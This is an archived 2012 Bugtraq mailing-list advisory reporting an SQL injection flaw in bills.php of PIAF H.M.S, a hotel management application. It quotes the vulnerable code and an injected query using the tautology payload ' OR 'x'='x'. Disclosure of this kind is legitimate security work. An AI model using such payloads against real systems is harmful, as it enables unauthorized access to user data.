lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 28 Oct 2012 13:29:31 +0100
From: Michał Błaszczak <blaszczakm@...il.com>
To: bugtraq@...urityfocus.com
Subject: PIAF H.M.S - SQL Injection

# Exploit Title: PIAF H.M.S - SQL Injection
# Date: 28/10/2012
# Author: Michał Błaszczak
# Website: http://blaszczakm.blogspot.com
# Vendor Homepage: http://code.google.com/p/piafhms/

file: bills.php
line: 86-87

        $query = $query . " ORDER BY ID DESC";
        printf($query);

query:
SELECT * FROM `Users` WHERE `Room` = 'anything' OR 'x'='x' ORDER BY ID DESC


Michał Błaszczak
blaszczakm.blogspot.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ